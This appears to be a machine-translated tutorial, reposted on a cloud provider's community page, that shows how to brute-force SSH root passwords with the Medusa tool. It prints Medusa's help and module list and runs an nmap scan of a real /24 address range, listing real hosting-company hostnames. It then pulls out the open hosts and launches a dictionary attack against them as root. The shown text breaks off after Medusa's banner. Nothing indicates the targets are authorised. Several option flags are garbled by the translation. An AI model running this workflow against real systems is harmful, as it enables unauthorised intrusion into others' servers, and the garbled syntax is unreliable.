Use medusa to crack the linuxssh Password

Source: Internet
Author: User
Tags imap nntp pcanywhere
From accidentally climbing the blog, it's easy to crack medusa with your handwriting. First, let's look at the help root @ perl-exploit: pentestexploitsframework3 # medusaMedusav1.5 [http: www.foofus.net] (C) JoMo-KunFoofusNetworksjmk@foofus.netALERT: Hosti

From accidentally climbing \ 'blog

It hurts, just click it, mEdUsa is still relatively fast to crack. First, let's look at the help

Root @ perl-exploit:/pentest/exploits/framework3 # meDuSa
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun/Foofus Networks

ALERT: Host infoRmAtion must beSuPplied.

Syntax: Medusa [-h host |-HFile] [-U username |-U file] [-p password |-P file] [-C file]-M module [OPT]
-H [TEXT]: Target hostname or IPDdRess
-H [FILE]: File containing target hostnames or IP addresses
-U [TEXT]: Username to test
-U [FILE]: File containing usernames to test
-P [TEXT]: Password to test
-P [FILE]: File containing passwords to test
-C [FILE]: File containing combo enTrIes. See READMEMoreInformation.
-O [FILE]: File to append log information
-E [n/s/ns]: Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT]: Name of the moduleExECutE (without the. mod extension)
-M [TEXT]: Parameter to pass to the module. This can be pasSedMultipleTimeS with
DiffErent parameter each time and they will all be sent to the module (I. e.
-M Param1-m Param2, etc .)
-D: Dump all known modules
-N [NUM]: Use for non-default TCP port number
-S: Enable SSL
-G [NUM]: Give up after trying to connect for NUM seconds (default 3)
-R [NUM]: Sleep NUM seconds between retry attempts (default 3)
-R [NUM]: Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-T [NUM]: Total number of logins to be tested coNcUrrently
-T [NUM]: Total number of hosts to be tested concurrently
-L: Parallelize logins using one username per thread. The default is to process
The entire username before proceeding.
-F: Stop scanning host after first valIdUsername/password found.
-F: Stop audit after first valid username/password found on any host.
-B: Suppress startup banner
-Q: Display module \'s usage information
-V [NUM]: Verbose level [0-6 (more)]
-W [NUM]: Error debug level [0-10 (more)]
-V: Display version
-Z [NUM]: Resume scan from host #

OK. Let's take a look at which modules medusa supports and what functions are cracked.

Root @ perl-exploit:/pentest/exploits/framework3 # medusa-d
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun/Foofus Networks

Available modules in ".":

Available modules in "/usr/lib/medusa/modules ":
+ Cvs. mod: Brute force module for CVS sessions: version 1.0.0
+ Ftp. mod: Brute force module for FTP/FTPS sessions: version 1.3.0
+ Http. mod: Brute force module for HTTP: version 1.3.0
+ Imap. mod: Brute force module for IMAP sessions: version 1.2.0
+ Mssql. mod: Brute force module for M $-SQL sessions: version 1.1.1
+ Mysql. mod: Brute force module for MySQL sessions: version 1.2
+ NCp. Mod: Brute force module for NCP sessions: version 1.0.0
+ Nntp. mod: Brute force module for NNTP sessions: version 1.0.0
+ Pcanywhere. mod: Brute force module for PcAnywhere sessions: version 1.0.2
+ Pop3.mod: Brute force module for POP3 sessions: version 1.2
+ Ipvs. mod: Brute force module for PostgreSQL sessions: version 1.0.0
+ Rexec. mod: Brute force module for REXEC sessions: version 1.1.1
+ Rlogin. mod: Brute force module for RLOGIN sessions: version 1.0.2
+ Rsh. mod: Brute force module for RSH sessions: version 1.0.1
+ Smbnt. mod: Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions: version 1.5
+ Smtp-vrfy.mod: Brute force module for enumerating accounts via smtp vrfy: version 1.0.0
+ Smtp. mod: Brute force module for SMTP AuthentiCatIon with TLS: version 1.0.0
+ Snmp. mod: Brute force module for SNMP Community Strings: version 1.0.0
+ Ssh. mod: Brute force module for SSH v2 sessions: version 1.0.2
+ Svn. mod: Brute force module for Subversion sessions: version 1.0.0
+ TeLnEt. mod: Brute force moduleTelnetSessions: version 1.2.2
+ Vmauthd. mod: Brute force module for the VMware Authentication Daemon: version 1.0.1
+ Vnc. mod: Brute force module for VNC sessions: version 1.0.1
+ Web-form.mod: Brute force module for web forms: version 1.0.0
+ Wrapper. mod: Generic Wrapper Module: version 1.0.1

Well, we need to crack ssh, so we need to use the-M ssh parameter to load the ssh module. We don't need to talk about it later with. mod.

First, let's determine the target, scan the machine that opens ssh, and find a segment to scan it.

Root @ perl-exploit:/pentest # nmap-sV-p22-oG ssh 69.163.190.0/24

Then there is a long wait. The preceding parameter scan means to scan the machine with port 22 in the entire segment, determine the service version, and save it to the ssh file.

Then we can view the scan results.

Root @ perl-exploit:/pentest # cat ssh
# Nmap 5.00 scan initiated Tue Jun 22 02:18:28 2010 as: nmap-sV-p22-oG ssh 69.163.190.0/24
Host: 69.163.190.1 (ip-69-163-190-1.dreamhost.com) Ports: 22/closed/tcp // ssh ///
Host: 69.163.190.2 (ip-69-163-190-2.dreamhost.com) Ports: 22/closed/tcp // ssh ///
Host: 69.163.190.3 (ip-69-163-190-3.dreamhost.com) Ports: 22/closed/tcp // ssh ///
Host: 69.163.190.4 (dragich.shaggy.dreamhost.com) Ports: 22/open/tcp // ssh // OpenSSH 5.1p1 Debian 5 (protoCol2.0 )/
Host: 69.163.190.5 (myrck.w.gebob.dreamhost.com) Ports: 22/open/tcp // ssh // OpenSSH 5.1p1 Debian 5 (protocol 2.0 )/
Host: 69.163.190.6 (apache2-twang.luthor.dreamhost.com) Ports: 22/open/tcp // ssh // OpenSSH 5.1p1 Debian 5 (protocol 2.0 )/
Host: 69.163.190.7 (ps11591.dreamhost.com) Ports: 22/open/tcp // ssh // OpenSSH 5.1p1 Debian 5 (protocol 2.0 )/
Host: 69.163.190.8 (ps000054.dreamhost.com) Ports: 22/open/tcp // ssh // OpenSSH 5.1p1 Debian 5 (protocol 2.0 )/
Host: 69.163.190.9 (rangerjill.com) Ports: 22/open/tcp // ssh // OpenSSH 5.1p1 Debian 5 (protocol 2.0 )/
Host: 69.163.190.10 (ouellette.yogi.dreamhost.com) Ports: 22/open/tcp // ssh // OpenSSH 5.1p1 Debian 5 (protocol 2.0 )/
Host: 69.163.190.11 (psmysql11957.dreamhostps.com) Ports: 22/open/tcp // ssh // OpenSSH 4.3p2 Debian 9etch2 (protocol 2.0 )/
Host: 69.163.190.12 (rubeo.yogi.dreamhost.com) Ports: 22/open/tcp // ssh // OpenSSH 5.1p1 Debian 5 (protocol 2.0 )/
Host: 69.163.190.13 (alt-malware.com) Ports: 22/open/tcp // ssh // OpenSSH 5.1p1 Debian 5 (protocol 2.0 )/
In this case, we need to sort out the ssh-enabled IP addresses. Now we understand the meaning of oG storage.

Root @ perl-exploit:/pentest #Grep22/open ssh | cut-d ""-f 2> ssh1.txt

ThisCommandThe cut is used. View results

Root @ perl-exploit:/pentest # cat ssh1.txt
69.163.190.4
69.163.190.5
69.163.190.6
69.163.190.7
69.163.190.8
69.163.190.9
69.163.190.10
69.163.190.11
69.163.190.12
69.163.190.13
69.163.190.14
69.163.190.15
69.163.190.16
69.163.190.17
69.163.190.18
69.163.190.19
69.163.190.22
69.163.190.23
69.163.190.24
69.163.190.25
69.163.190.26
69.163.190.27
69.163.190.28
69.163.190.29
69.163.190.30
69.163.190.31
69.163.190.32
69.163.190.33
69.163.190.34
69.163.190.35
69.163.190.36
69.163.190.37
69.163.190.38
69.163.190.39
69.163.190.40
69.163.190.41
69.163.190.42
69.163.190.43
69.163.190.44
69.163.190.45
69.163.190.46
69.163.190.47
69.163.190.48
69.163.190.49
69.163.190.50
69.163.190.51
69.163.190.52
69.163.190.53
Now, let's start looking for a dictionary and cracking the ssh password.

Root @ perl-exploit:/pentest # medusa-H ssh1.txt-u root-P p.txt-M ssh

Root @ perl-exploit:/pentest # medusa-H ssh1.txt-u root-P p.txt-M ssh
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun/Foofus Networks

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.